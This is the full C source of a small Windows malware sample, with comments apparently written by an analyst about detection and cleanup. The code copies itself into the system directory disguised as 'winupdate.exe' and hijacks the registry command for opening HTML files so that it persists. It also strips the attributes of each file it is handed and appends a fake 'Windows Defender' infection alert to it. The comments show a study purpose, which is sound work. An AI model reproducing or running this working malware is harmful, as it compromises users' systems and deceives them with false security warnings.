#define WIN32_LEAN_AND_MEAN
#include <stdio.h>
#include <windows.h>
#include <shellapi.h>
// Reference value: (Default) "C:\Program Files\Internet Explorer\iexplore.exe" %1
// NOTE(review): presumably the stock (Default) data of the
// HKCR\htmlfile\shell\opennew\command key that main() overwrites; confirm
// against a clean system before using it as the remediation value.
//
// Script block that main() appends to the file named on the command line.
// It only raises a fake "Windows Defender" alert, but every file that has
// been opened through the hijacked handler ends with this exact text, so the
// literal (including the "Win32/BullMoose" name) is a usable content
// signature for finding modified files.
const char InfectString[] = "\n<script>alert(\"Warning: This file has been detected by Windows "
"Defender to be infected with Win32/BullMoose!\");</script>";
// Entry point of the sample. Behaviour as written:
//   1. When started with exactly one argument (the file path handed over by
//      the hijacked shell verb), it modifies that file and then shows it in
//      Internet Explorer so the user still sees the page open.
//   2. On every run, with or without an argument, it copies its own image
//      into the system directory as winupdate.exe and rewrites the default
//      value of HKCR\htmlfile\shell\opennew\command to point at that copy.
// No API return value is checked anywhere in this function, so a failing
// step (for example, missing write access) goes unnoticed and execution
// simply continues.
// Observable artifacts for detection and cleanup: a winupdate.exe file in
// the system directory, the changed command value under HKCR\htmlfile, and
// files ending with the InfectString script block.
int main(int argc, char *argv[])
{
// exactly one argument: the path of the file to process
if(argc==2) {
// reset the file's attributes to FILE_ATTRIBUTE_NORMAL, which clears flags
// such as read-only that would block the append below
SetFileAttributes(argv[1],FILE_ATTRIBUTE_NORMAL);
// open the file in append/text mode ("at"); existing content is kept
FILE *file = fopen(argv[1],"at");
// append InfectString to the end of the file
fputs(InfectString,file);
// close the file so the change is flushed before the browser reads it
fclose(file);
// launch Internet Explorer from its hard-coded path with the modified file
// as the parameter, imitating the handler that was replaced
ShellExecute(NULL,"open","\"C:\\Program Files\\Internet Explorer\\iexplore.exe\"",argv[1],NULL,SW_SHOW);
}
// fixed 256-byte buffers: MyPath = path of the running image,
// CpyPath = destination path, later reused as the registry command line
char MyPath[256], CpyPath[256];
// full path of the currently running executable
GetModuleFileName(NULL,MyPath,sizeof(MyPath));
// system directory path (e.g. C:\Windows\System32)
GetSystemDirectory(CpyPath,sizeof(CpyPath));
// build the drop path <system directory>\winupdate.exe; the name imitates a
// Windows update component
strcat(CpyPath,"\\winupdate.exe");
// copy the running image to the drop path; FALSE = overwrite an existing file
CopyFile(MyPath,CpyPath,FALSE);
// append " %1" so the shell passes the opened file's path as the argument,
// turning CpyPath into the command line stored in the registry
strcat(CpyPath," %1");
HKEY Key32;// registry key handle
// open the existing htmlfile "opennew" command key for writing
// NOTE(review): writing here and into the system directory normally needs
// elevated rights; confirm on the target Windows version
RegOpenKeyEx(HKEY_CLASSES_ROOT,"htmlfile\\shell\\opennew\\command",0,KEY_WRITE,&Key32);
// an empty value name selects the key's (Default) value; it is replaced with
// "<system directory>\winupdate.exe %1", which is the persistence step
RegSetValueEx(Key32,"",0,REG_SZ,CpyPath,strlen(CpyPath));
// release the key handle
RegCloseKey(Key32);
// always reports success to the caller
return 0;
}